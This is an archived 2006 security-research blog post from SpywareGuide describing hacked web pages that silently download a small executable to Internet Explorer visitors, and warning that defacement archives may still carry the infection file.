Quick Links: SpywareGuide Greynets Blog | SpywareGuide Product Database | SpywareGuide Company Database | SpywareGuide Categories
SpywareGuide powered by FaceTime Security Labs
Search SpywareGuide Greynets Database & Site
Security Email Alerts & Updates
 
Search the Blog
 
Recent Posts
Categories
Monthly Blog Archives
Links
Subscribe
Subscribe to this blog's feed
About the Blog
About SpywareGuide Greynets Blog
Link to Us
Link to SpywareGuide.com

« WhenU "Partner" Pushes "Myspace" Videos in P2P Land | Main | Browzar: The Story So Far »

  • Bl4ck: Coming Soon to a Hacked Page Near You

Quite often, you'll come across a website that's been hacked and admire the no doubt humorous picture, comical text and "advice" given to the site Admin as little more than a harmless prank and something to be filed away on a hacked site archive. Well, beware because many of those "hacked site" archives don't clean up the pages beforehand - you'll likely be hit with something nasty if the hacker decided to put something evil there. And wouldn't you know it if we have one such example for you coming up?

An individual under the alias of of SnIpEr_SA is currently making his way through as many domains as he can handle (currently up to 25+ in the last ten days, which isn't very prolific thankfully) and leaving a little "present" for anyone unlucky enough to view his pages while using IE:

http://blog.spywareguide.com/upload/2006/08/bl4ck1-thumb.jpg
Click to Enlarge

As you can see, the file (a 5kb MS-DOS application) is downloaded to the Temp files. The interesting aspect about this file is its strange behavior.

http://blog.spywareguide.com/upload/2006/08/bl4ck22-thumb.jpg
Click to Enlarge

In fact, it doesn't seem to do much of anything, which simply makes me all the more suspicious. Closer examination of the file reveals some interesting findings. Usually inside the code of a malicious application reveals all kinds of things - additional download links, clues with regards what the file does, passwords, the name of the creator...you name it, we've found it on our travels. However, this is the first time I've looked inside a file like this and found what appears to be the HTML for a webpage telling you "this account has been suspended". Even stranger, there's a number of links to various webhosting companies (but not specific download links, as you would expect), an advert link and a reference to Elitemediagroup.

As a parting thought, it's worth noting that if you go to websites such as Zone H to view the latest archived webpage defacements, they do indeed include the above hacks by SnIpEr_SA. However, they also include the infection file, which raises the interesting question of how many people over the last however many years have been infected by viewing archived defacements.

Suddenly, checking out all those cool hacks doesn't seem quite as appealing...

Research Summary Write-Up: Chris Boyd, Director of Malware Research
Technical Research and Discovery: Chris Mannon, FSL Senior Threat Researcher

Posted by Paperghost on August 29, 2006 10:20 AM |

  • Comments

I will continue to visit enjoyed the reading thanks

Posted by: I will continue to visit enjoyed the reading thanks | September 2, 2006 04:00 AM

HI there! Just want to say that I find your site enough interesting for me. Though interesting for me. Usefull information and all is good arranged. I will visit your site more ofter from now and I bookmarked it.
. Thank you for your work.

Posted by: Helman | October 1, 2006 05:46 PM

myspace has been hit with this assholish virus ^^

Posted by: Daramark | October 15, 2006 04:30 AM

Site EULA | Site Map | Contact Us | About Us | Site and Spyware FAQ | Advertise | RSS Feeds  | Link To Us | SpywareGuide JapanJapanese

© Copyright 2006, FaceTime Communications, Inc. All rights reserved.